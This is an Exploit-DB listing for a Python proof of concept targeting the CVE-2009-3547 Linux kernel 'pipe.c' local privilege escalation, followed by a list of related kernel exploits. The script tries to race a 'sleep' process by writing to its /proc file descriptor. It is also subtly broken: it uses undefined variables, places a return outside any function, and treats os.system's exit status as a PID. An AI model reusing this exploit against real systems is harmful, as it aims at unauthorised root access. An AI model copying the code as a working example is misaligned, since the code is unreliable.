Exploit

EDB-ID: 9844	Author: Matthew Bergin	CVE: CVE-2009-3547
Published: 2009-11-05	Type: local	Platform: Linux
E-DB Verified:	Exploit: Download // View Raw	Vulnerable App: N/A

« Previous Exploit Next Exploit »

# This is a PoC based off the PoC release by Earl Chew
# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
# PoC by Matthew Bergin
# Bugtraq ID:       36901

import os
import time
import random
#infinite loop
while (i == 0):
        os.system("sleep 1")
        while (x == 0):
                time.sleep(random.random()) #random int 0.0-1.0
                pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
                if (pid == 0): #need an active pid, race condition applies
                        print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
                        return
                else:
                        print "[+] PID: " + pid
                        loc = "echo n > /proc/" + pid + "/fd/1"
                        os.system(loc) # triggers the fault, runs via sh

Related Exploits

Matching CVEs (1): CVE-2009-3547
Matching OSVDBs (1): 59654
Other Possible E-DB Search Terms: Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5, Linux Kernel 2.4.1, Linux Kernel

Please note, there is more than 25 search results, however had to limit the amount returned...

Date		Title	Author
2003-03-30	3	Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation	Wojciech Purczynski
2003-04-14	12	Linux Kernel < 2.4.20 - Module Loader Privilege Escalation	KuRaK
2003-07-29	68	Linux Kernel 2.4.20 - 'decode_fh' Denial of Service	Jared Stanbrough
2003-12-02	129	Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation (PoC)	Christophe Devine
2003-12-05	131	Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation	Wojciech Purczynski
2004-01-06	141	Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1)	Christophe Devine
2004-01-07	142	Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2)	Christophe Devine
2004-01-15	145	Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation (3)	Paul Starzetz
2004-02-18	154	Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1)	Christophe Devine
2004-03-01	160	Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)	Paul Starzetz
2001-01-02	237	Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit	Stealth
2004-04-21	274	Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service	Julien Tinnes
2004-06-25	306	Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service	lorenzo
2004-08-04	375	Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure	Paul Starzetz
2004-11-10	624	Linux Kernel 2.4.27 / 2.6.8 - 'binfmt_elf' Executable File Read Exploit	Paul Starzetz
2004-12-14	685	Linux Kernel 2.4.28 / 2.6.9 - 'scm_send Local' Denial of Service	Paul Starzetz
2004-12-14	686	Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service	Paul Starzetz
2004-12-16	690	Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow	Georgi Guninski
2004-12-16	691	Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local Denial of Service	Georgi Guninski
2004-12-16	692	Linux Kernel 2.4.28 / 2.6.9 - 'ip_options_get' Local Overflow	Georgi Guninski
2004-12-24	718	Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation	Marco Ivaldi
2005-01-07	744	Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)	Paul Starzetz
2005-01-27	778	Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)	Tim Hsu
2005-03-22	895	Linux Kernel 2.4.x / 2.6.x - 'uselib()' Privilege Escalation (3)	sd
2005-03-29	904	Linux Kernel 2.6.10 - Local Denial of Service	ChoiX

Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)

Related Exploits